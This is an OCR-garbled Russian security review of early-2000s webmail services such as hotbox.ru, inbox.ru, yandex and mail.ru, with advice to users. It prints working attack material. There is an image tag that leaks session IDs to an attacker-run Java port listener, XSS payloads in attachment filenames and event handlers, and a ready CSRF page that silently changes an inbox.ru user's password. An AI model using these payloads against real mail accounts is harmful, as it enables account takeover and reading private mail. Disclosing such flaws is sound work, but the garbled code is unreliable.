На главную | Содержание | Назад | Вперёд
Наши друзья

 

 

ЗАЩИЩАЙТЕ ВАШУ ПОЧТУ!

Кратко коснусь истории ошибок рассматриваемого почтового сервиса и укажу некоторые результаты последнего тестирования на безопасность WWW-интерфейсов российских почтовых служб при работе с современными настроенными по что
соответствует 99% случаев. Конечно, большинство ошибок будут уст­ранены, многие вообще не коснутся работающих стандартными мето­дами (через почтовые протоколы РОРЗ& ШАР &SMTP), но общее впечатление о политике и уровне безопасности вы сможете составить. Есть мнение, что безопасный WWW-интерфейс для чтения почты создать почти невозможно без существенного снижения качества письма, т. к. браузеры изначально не расчитаны на подобные функции, а регулярно появляющиеся новые возможности делают малоэффек­тивной фильтрацию. Очень многие не согласны с этим, но до сих пор все крупнейшие сервисы страдают от всё новых и новых ошибок. Да­же в такой уважаемой службе, как hotmail.com, очередной баг был вы­явлен всего полмесяца назад...
Забегая вперед, приведу сводные результаты тестирования: так ни одна из рассмотренных служб не была безопасной при стан­дартных настройках браузеров, предоставляя атакующему возмож­ность, слегка помучившись, отобрать аккаунт. Для безопасной работы
придется, как минимум, отключить поддержку сценариев (Javascript), а иногда не спасет и это.
Из российских почтовых служб наиболее известными (автору) являются: Mail.ru, FreeMail.ru ( km.ru) , newmail.ru (hotmail.ru, nm.ru) (временно прекратил регистрацию пользователей и свежих тестов нет), mail.rambler.ru, mail.yandex.ru (narod.ru), inbox.ru. Особняком стоит hotbox.ru (pochtamt.ru, pisem.net, mailru.com, krovatka.net, rbc-mail.ru.) — единственный известный российский сервис, поддержива­ющий защищенные соединения и гарантирующий полную конфиден­циальность. Теоретически этот сервер должен (был) служить этало­ном безопасности, поэтому с него и начнем.
iOTBOX.RU
Заявленные возможности. Как уже упоминалось, это единст­венный сервис, поддерживающий защищенные соединения и изна­чально ориентированный на конфиденциальность. Кстати, по заяв­ленным возможностям, он — самый функциональный из аналогичных служб. Размер почтового ящика — 20 Mb!
Возможность работы по WWW-интерфейсу в защищенном и
обычном режимах.
Поддерживает стандартные протоколы РОРЗ, ШАР (!) и SMTP
с поддержкой SSL.
Поддерживает пересылку. Поддерживает фильтрацию. Встроенной антивирусной проверки нет.
Большой выбор доменов: hotbox.ru, pochtamt.ru, pisem.net, mail-r::.com, krovatka.net, rbcmail.ru.
История. При заходе на сервер Вы можете прочитать: «От про-сервисов нас отличают:
- Абсолютная конфиденциальность - мы предоставляем воз­можность использовать защищенный режим, в котором вся пользова­тельская информация шифруется.
- Высокая надежность — наш опыт работы (сайт открылся бо­лее года назад) и наши пользователи (а их более 400 тыс.) служат то­му подтверждением.
— Безопасность.»
На первый взгляд, от посещения службы остается доброе впе­чатление: отличный набор возможностей, можно нормально работать
без Javascript, во время работы пользователь идентифицируется по
случайному многозначному идентификатору, почти все опасные наст­ройки (кроме пересылки) защищены паролями, а включение форвар-
динга требует подтверждения от конечного адреса, что позволяет из­бежать случайной ошибки.
Небольшая очевидная ошибка выявилась только при регистра­ции: предлагались нестойкие секретные вопросы типа «Девичья фа­милия матери» (впрочем, это общая болезнь, да и пользователю само­му думать головой надо). В общем, на минуту показалось, что вот он -идеальный ресурс. Увы, только на одну минуту. Первое же тестирова­ние выявило, что сервер подвержен простейшим ошибкам в фильтра­ции скриптов и других опасных тегов, но это оказалось не самым худ­шим.
Как уже было отмечено, во время работы пользователь иденти­фицируется по случайному многозначному идентификатору (id) и, ра­зумеется, IP и/или cookies. Тест показал, что это не так! Узнав значе­ние id на ящик, оказалось возможным зайти с другого адреса, напри­мер, после обрыва соединения! Более того, не требовалось и поддерж­ки «пирожков» (хотя узнать их при возможности выполнить скрипт проблемой не являлось). Фактически, для несанкционированного просмотра ящика достаточно себе поставить простейшую программу, регистрирующую обращения к 80-му (или другому указанному в адре­се) порту, послать письмо, вставив в него нефильтруемый тег, прово­цирующий браузер на автоматическое обращение к машине атакую­щего (например, с помощью ссылки на картинку, якобы расположен­ную на IP адресе взломщика < img
щика: порт/anyname.gif width=l height=l >), и, дождавшись, пока жертва зайдет читать почту, посмотреть поле в заголовке
пришедшего запроса!
GET /anyname.gif НТТР/1.0
R е f е г е г :
http: //www.hotbox. ru/message .php.?id=b04bl3da32e6345bc 2b9bc72fl9014cf&index=6&array_index=5
Connection: Keep-Alive
Пример Java-утилиты для прослушивания порта.
type sserv.java
importijava.io.* import Ошибка! Недопустимый объект гиперссылки.import java.util.*
public   class   sserv {
public  static void main{String argsfj) {
ServerSocket ss Socket s InputStream try {
ss  =  new ServerSocket (80);   //  Номер  слушаемого порта.
s - ss.acceptO is = s.getlnputStream () byte buf[]   = new byte[512] int lenght = is.read(buf) System.out.write(buf,0,lenght) is.close ()
} catch (Exception ioe>)
System.out.println(ioe.toString()); }
} // end main }  //end sserv
:   javac ssev.java : ]ava sserv
Атакующему осталось только отключить поддержку cookies в своем браузере, полностью набрать указанный в Referer адрес и парал­лельно «работать с почтой» (почитать письма, установить пересыл­ку...), пока хозяин не выйдет из нее.
Если злоумышленник не имеет постоянного соединения с сетью, он может воспользоваться дырками в фильтрации тегов, чтобы устано­вить с помощью языков сценариев пересылку (для этого придется от­править дополнительное письмо с кодом подтверждения).
Примеры ошибок фильтрации:
Не фильтруются теги в именах присоединенных файлов:
Content-Type: text/html; charset-us-ascii; name,=»test. html»
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename=»te script >
location.href=location.href.replace («index»,»actionID
=l&index»);  < /script > st.html»
Приведенный пример автоматически удалит пришедшее «зара­женное» письмо после выполнения каких-то действий.
Не фильтруются также обработчики событий, например:
< img src=»about:апу» height=1600 width=1600 onMouseOver-' любой код для эксплоита;  return true;'>,
Скрипты, записанные в эти поля выполнятся сразу после откры­тия письма или первого движения мыши в письме. Есть и другие дыр­ки. Окончательным свидетельством небрежного подхода разработчи­ков к Веб-интерфейсу стало хранение данных в cookies: при включен­ной опции «запомнить пароль» — последний сохраняется в виде plain
text без какой-либо шифровки вместе с логином!
Итог. В принципе, идеи заложены подвели неаккурат-
ность и стремление сделать работу поудобнее. Если не пользоваться веб-интерфейсом, работая по защищенным почтовым протоколам ч/з Outlook Express, то безопасность будет существенно выше, чем у кон­курентов. Конечно, при условии, что остальные возможности не реа­лизованы так же «аккуратно».
lnbox.ru
Заявленные возможности. Размер почтового ящика — 2 Mb.
Возможность работы по WWW-интерфейсу.
Поддерживает стандартные протоколы РОРЗ и SMTP для рабо­ты с почтовыми программами.
Поддерживает пересылку. Поддерживает фильтрацию.
Встроенной антивирусной проверки нет.
Защищенных соединений, увы, не поддерживает.
История. Сервис появился в 1998 году, основан на модифициро­ванном ПО, разработанном mail.ru.
Безопасность. Очевидные недостатки:
- Смена пароля и установка пересылок никак не защищены
(подтверждения паролем не требует, место отсылки формы не прове­ряется).
- Пропускает скрипты в имени присоединенных файлов (кроме .htni-BCKiix), что делает отбор ящика элементарным. Ниже дан пример
простейшего эксплойта (без маскировки), меняющего пароль при
открытии письма.
Размещаете на Веб-страничке любого общедоступного сервиса
отредактированный файл editprofil.html (приведенный ниже).
В отсылаемом письме редактируете строку, содержащую имя
присоединенного файла (содержание письма особой роли не играет), аттач не должен иметь расширение htm, html или txt, как показано ни­же.
Content-Type:   image/gif; charset=us-ascii name=»test.gif»
Content-Transfer-Encoding: base64
Content-Disposition: inline
filename=»te < script >
locaton.href=»Ошибка! Недопустимый объект гиперссылки.) < /script  > st.gif»
editprofil.html
( не забудьте отредактировать ДОМЕН, ИМЯ_ПОЛЬЗОВАТЕ-ЛЯ и НОВЫЙ_ПАРОЛЬ)
<html>
<body>
. <form    method=post    action=»http;//win.inbox.ru/cgi-bin/modifyuser?modify»>
<input type=»hidden» name=»Username» value=» ^^ПОЛЬ­ЗОВАТЕЛЯ «>
<input type=»text» narae»»Re&lNaffie» value=»A. V. Komlni»>
<input type=»text»
<input HO-
БЫЙ_ПАРОЛЬ «>
<input type=»password» name=»Password_Verify» value=» НОВЫЙ_ПАРОЛЬ «>
<input type-checkbox name=»Flags-DoNotKeepMail» > He сохранять почту при пересылке<Ьг>
<input <input
type=»reset» уа1ие=»Восстановить»> '
</form>
<SCRIPT  LANGUAGE=»JavaScript»> document.forms[0].submit();
</script> </body> </htm >
Неочевидные недостатки. Требует лично заходить на сервер не реже, чем раз в полгода, иначе ящик будет отключен и его сможет за­хватить кто угодно.
Безопасность. Достоинства. Возможность нормальной работы без поддержки Javascript.
Итог. Веб-интерфейсом лучше не пользоваться до его доработки и смены отношения к безопасности или отключать поддержку сцена­риев (Javascript) перед просмотром писем и не открывать ссылок в письме.

Yandex.rt (narod.ru)
Заявленные возможности. Размер почтового ящика - 5 Mb. Возможность работы по WWW-интерфейсу. Поддерживает стандартные протоколы РОРЗ и SMTP. Поддерживает пересылку. Поддерживает фильтрацию.
Встроенной антивирусной проверки нет.
Защищенных соединений, увы, не поддерживает. Работает довольно быстро.
История. Эта служба была запущена относительно недавно — в конце 2000 года, но уже послужила причиной нескольких публикаций на RSN Forum'e, посвященных грубым ошибкам в ее системе безопас­ности. А. Большаковым была выявлена плохая фильтрация тегов «script» поле Subject и имени присоединённых файлов. Вместе с никак незащищенной схемой смены пароля это позволило силами посетите­лей RSN Forum'a написать простой эксплойт, захватывающий почто­вый ящик пользователя при простом открытии письма. Службе под­держки yandex.ru потребовалось всего несколько дней, чтобы устра­нить ошибки с конкретными полями и тегами, но, увы, механизм сме­ны пароля серьезных изменений не претерпел, что позволяет успешно
повторить попытку при обнаружении новых ошибок в фильтрации.
Безопасность. Очевидные недостатки:
- При регистрации предлагает нестойкие секретные вопросы
(общая болезнь).
- Нормальная работа сервиса невозможна без включенной под­держки Javascript, а механизм смены пароля никак не защищен, что позволяет при наличии дырки в фильтрации скриптов сменить пароль при открытии письма.
Найти новую дырку оказалось нетрудно. Не фильтруются обра­ботчики событий, поэтому при подстановке в тело письма ссылки на рисунок вида:
< img src-»about:any» height=1600 width-1600 onMouseOver='
любой код для эксплойта;
return true;' >, можно выполнить любой код эксплойта. Подстановка впереди тега
< div style=»position:absolute; top:0; left:С;back­ground-color :#FFFFFF;padding:8px» >
i!o.iiio.iirr сразу занять весь экран, чтобы не ждать, пока жертва двинет мышкой. Для захвата ящика после небольшой модификации подойдет
старый эксплойт.
Неочевидные недостатки. Не смотрел: вполне достаточно оче­видных.
Безопасность. Достоинства. Можно включить пересылку или работать по РОРЗ /SMTP, забыв о Веб-интерфейсе.
Итог. Веб-интерфейсом вообще лучше не пользоваться до ко­ренной его переработки и смены политики безопасности. Сервер быст­рый и удобный, ничто не мешает вам воспользоваться стандартными
методами работы с почтой.
MAIL.RU
Самый популярный российский почтовый сервис (и один из ста­рейших). Короткое и очевидное имя сервиса. Конечно, все простые имена пользователей давно разобраны. Мощная служба поддержки.
Заявленные возможности. Размер почтового ящика — 2 Mb. Ожидается увеличение.
Возможность работы по WWW-интерфейсу.
Поддерживает стандартные протоколы РОРЗ и SMTP. Поддерживает пересылку (до трех адресов). Поддерживает фильтрацию.
Встроенной антивирусной проверки нет. Защищенных соединений, увы, не поддерживает. Работает довольно медленно.
История. Изначально отношение к политике безопасности было крайне неудовлетворительным. Результат не заставил себя ждать: за 1999, 2000 годы в нем были обнаружены десятки ошибок, включая возможности кражи списков почтовых адресов, отбора почтовых ящи­КОВ, чёрный ход, оставленный одним из программистов, позволяющий узнать пароль и отобрать или прослушивать почтовый ящик, и, нако­нец, сам сервер был ненадолго взломан. Последняя широко опублико­ванная ошибка в WWW-интерфейсе была обнаружена в январе 2001 года. К счастью, болезненные уроки пошли впрок и на сегодня извест­ные серьезные убраны, а роль безопасности пересматривается. Надо отдать должное службе поддержки, которая работает очень опе­ративно, устраняя ошибки даже в праздничные дни.
Безопасность. Очевидные недостатки.
— Защищенных соединений, увы, не поддерживает.
-- При регистрации предлагает нестойкие секретные вопросы (общая болезнь).
Неочевидные недостатки. Несмотря на то, что при попытке из­менить настройки требуется ввести старый пароль, при открытии
формы «Личные данные» открытым текстом высвечиваются секрет­ный вопрос и ответ на него, что делает возможным их похищение при включённом Javascript (например, методом «поддельной открытки»), с полным доступом к ящику в итоге.
Требует лично заходить на сервер не реже, чем раз в полгода, иначе ящик будет отключен и его сможет захватить кто угодно. Един­ственная выявленная возможность несанкционированно выполнить скрипт является не просчетом программистов, а ошибкой некоторых версий IE, позволяющей некорректному серверу вместо рисунка подставить HTML-код.
Content-Type:   image/gif;   charset = us-ascii Content-Transfer-Encoding: 7bit < script > ... < /script >
Безопасность. Достоинства.
- Возможность работы без поддержки Javascript.
- Регистрация последнего доступа к ящику.
- Явное сообщение на первой странице о включенной пересылке.
Итог. Долгие издевательства над сервером привели к существен­ному росту уровня безопасности и пересмотру методов ее реализации. На сегодня ошибки могут в основном подстерегать вас в WWW-ин-терфейсе, но возможность работы без языков сценариев позволяет свести этот риск к минимуму, если вы настроите браузеры или перед работой будете отключать Javascript (в Орег'а и Netscape).
В общем, если вам не нужна секретность (конфиденциальность) или вы планируете обеспечить ее шифровкой самих писем, Mail.ru -
хороший выбор. Чтобы не рисковать и не страдать от медленной рабо­ты и маленького ящика — используйте переадресацию. Изредка захо­дите, проверяйте, не заглядывает ли кто посторонний (по времени последнего доступа). Работая с Веб-почтой, никогда не открывайте
сразу ссылки, приведенные в письме. Это чревато кражей секретного
вопроса и ответа. Скопируйте ссылку в буфер (правой кнопкой мы­ши), выйдите из почты соответствующей кнопкой и только после это­го откройте в новом окне браузера ссылку. Долго? Зато безопасно. Как
альтернативный вариант, перед чтением писем можно отключать Javascript (активные сценарии) и Java.
freemail.ru (km.ru)
Заявленные возможности. Короткое имя сервиса.
Предоставляет 5 Mb места.
Возможность работы по WWW-интерфейсу.
Стандартные протоколы РОРЗ и SMTP.
Пересылку не поддерживает. Фильтрации нет.
Встроенная антивирусная проверка есть.
Защищенных соединений, увы, не поддерживает.
Безопасность. Очевидные недостатки:
- Восстановление пароля производится только по резервному e-mail. Грамотный секретный вопрос был бы лучше.
- Изменение настройки производится свободно, подтвержде­ния не требует, место отсылки формы не проверяется: очень опасное решение!
От элементарного отбора адресов спасает только полная фильт­рация тегов, приводящая к ухудшению качества приходящего письма, и возможность работы без активных сценариев, но с учетом отсутст­вия проверки содержимого вложений, описанных как рисунки. Те, кто смотрит почту с Веб-интерфейса через MS IE, могут лишиться ее даже при попытке открыть вложенный рисунок (а открывать их приходит­ся, т. к. сама служба этого не делает из-за блокировки тегов). Вполне
применим и метод «поддельной открытки». Достоинства:
- Возможность работы без поддержки Javascript.
— Всеобщая фильтрация тегов — достаточно кардинальное, хотя и неудобное решение проблемы с несанкционированными скриптами. Осталось только вложенные файлы проверять!
Итог. Веб-интерфейсом вообще лучше не пользоваться до его доработки. Отсутствие пересылки сильно снижает полезность серви­са. Отсутствие секретного вопроса затрудняет возможность возврата украденного логина.
Newmail.ru (hotmail.ru, nm.ru)
К сожалению, этот сервис прекратил регистрацию новых пользо­вателей и нормально протестировать его нет возможности.
Заявленные возможности. Предоставляет до трёх адресов на один ящик. Размер почтового ящика — 10 Mb.
Возможность работы по WWW-интерфейсу.
Поддерживает стандартный протокол РОРЗ для приема почты.
Поддерживает пересылку.
Поддерживает фильтрацию.
Встроенной антивирусной проверки нет. Защищенных соединений, увы, не поддерживает.
История. Сервис существует около двух лет. Последний раз ав­тор проверял его больше года назад. Потом забыл зайти подтвердить регистрацию и аккаунт был удален. Впечатления о себе оставил не­плохие, но полностью «поддерживал» основные ошибки.
Безопасность. Очевидные недостатки:
- При регистрации опасные секретные вопросы.
- Данные годичной давности.
- Смена настроек не была защищена паролем.
- Пропускались теги сценариев в обработчиках событий (On
OnMouseMove) основных тегов, что открывало перспек­тивы лёгкого отбора ящиков способом, аналогичным описанному для inbox.ru.
Неочевидные недостатки. Требует лично заходить на сервер не реже, чем раз в полгода, иначе ящик будет отключен и его сможет за­хватить кто угодно.
Безопасность. Достоинства. Появился способ захода с возмож­ностью работы без поддержки Javascript (хороший признак). Логин для управленния аккаунтов может не совпадать с именем ящика
(очень полезная идея).
Итог. В принципе, о безопасности думали, времени прошло не-
мало, может и улучшили что-то. Впрочем, пока регистрации нет и ошибки сервиса малоактуальны. Если у кого-то есть рабочий ящик, может, разрешите протестировать?
Rambler.ru
Заявленные возможности. Размер почтового ящика — 5 Mb.
Возможность работы по WWW-интерфейсу.
Увы, не поддерживает стандартные протоколы для работы с поч­товыми программами.
Поддерживает пересылку (хотя и путем ухищрений).
Поддерживает фильтрацию.
Встроенной антивирусной проверки нет.
Защищенных соединений, увы, не поддерживает.
История.    Сервис появился недавно и фактически ограничен
Веб-интерфейсом.
Безопасность. Очевидные недостатки:
— Установка пересылок и извещений на пейджер никак не защи­щена.
- Установка пересылок через фильтр тоже.
- опять пропущены скрипты в обработчиках событий ос­новных тегов, что делает прослушивания ящиков доста­точно простой задачей.
- Приемы аналогичны применяемым для inbox.ru.
Неочевидные недостатки. Требует лично заходить на сервер не реже, чем раз в полгода, иначе ящик будет отключен и его сможет за­хватить кто угодно.
Безопасность. Достоинства. Возможность нормальной работы
без поддержки Javascript. Возможность полного запрета тегов HTML
в письме.
Итог. При дополнительной настройке браузера и самой почты
этот сервис не опаснее других. За это приходится платить качеством. zmail.ru
Заявленные возможности. Размер почтового ящика — 3 Mb.
Возможность работы по WWW-интерфейсу.
Поддерживает стандартные протоколы РОРЗ, SMTP (платно),
IMAP для работы с почтовыми программами (платно). Поддерживает пересылку (платно).
Поддерживает фильтрацию.
Большой выбор доменных имен (Ошибка! Недопустимый объект гиперссылки., @id.ru, Ошибка! Недопустимый объект гиперссылки., @ok.ru, @ru.ru и Ошибка! Недопустимый объект гиперссылки.).
Встроенной антивирусной проверки нет.
Защищенных соединений, увы, не поддерживает.
История. Вообще-то zmail.ru — фактически платный сервис (доступен только Веб-интерфейсу, все остальные возможности, необ­ходимые для работы, предоставляются за дополнительную оплату) и не совсем подходит под тематику данного обзора. Попал он сюда как наглядный пример того, что за дополнительные деньги иногда приоб­ретаются дополнительные уязвимости.
Безопасность. Очевидные недостатки:
- При регистрации опасные секретные вопросы (об­щая болезнь).
- Сервис также пропускает сценарии в обработчиках событий и теги таблицы стилей:
< div style=»position:absolute;top:0;left:0;back-ground-color:#FFFFFF;padding:8px»>
< img src-»pl» height-1600 width=1600 OnMouseOver-5 alert(window.location);  return null;'> Тем не менее, отобрать ящик непросто, т. к. установка нового па­роля и резервного адреса требует знания старого пароля. Зато можно
его незаметно заблокировать, т. к. фильтры устанавливаются свобод­но. Куда большая неприятность ждет платных пользователей — им разрешена которую можно незаметно установить через си-
стему фильтров и свободно прослушивать почту!
Безопасность. Достоинства. Возможность нормальной работы без поддержки Javascript. Смена пароля защищена владельцем. Иден­тификация по уникальному номеру сессии и ключу.
Итог. В бесплатном варианте — сервис с небольшими возмож­ностями и ошибками. За дополнительную плату — дополнительные
дырки! Как всегда, активные сценарии (Javascript, VBScript) лучше
отключить сразу. В общем, неплохие начинания, но еще много недора­боток.
360.ru
Заявленные возможности. Размер почтового ящика — 5 Mb. Возможность работы по WWW-интерфейсу.
Поддерживает стандартные протоколы для работы с почтовыми программами.
Не поддерживает пересылку. Не поддерживает фильтрацию. Встроенной антивирусной проверки нет. Поддержка защищенных соединений.
История. Сервис появился недавно и еще не особо известен, но поддержка соединений заставила автора рассмотреть его
поближе. Увы, никакой уровень шифрования не спасает Веб-интер­фейс от небрежной реализации. Сервис «поддерживает» все стандарт­ные ошибки.
Безопасность.  Очевидные недостатки.   Изменение настроек,
ничем не защищено. Вдобавок, пропускаются сценарии в обработчи­ках событий и теги таблицы стилей:
< div style=»position:absoluce;top:0;left:0;back-ground-color:#FFFFFF;padding:8px»>
< img src=»pl» height=1600 width=1600 OnMouseOver='alert(window.location); return
Что делает отбор ящика элементарной процедурой (методика аналогична применяемой для inbox.ru)? Безопасность.
Достоинства. Поддержка защищенных соединений.
Итог. Веб-интерфейсом вообще лучше не пользоваться до корен­ной его переработки и смены политики безопасности. Сервер пока быс­трый, к тому же поддерживает защищенные соединения и ничто не ме­шает вам воспользоваться стандартными методами работы с почтой.

 

На главную | Содержание | Назад | Вперёд
 
Яндекс.Метрика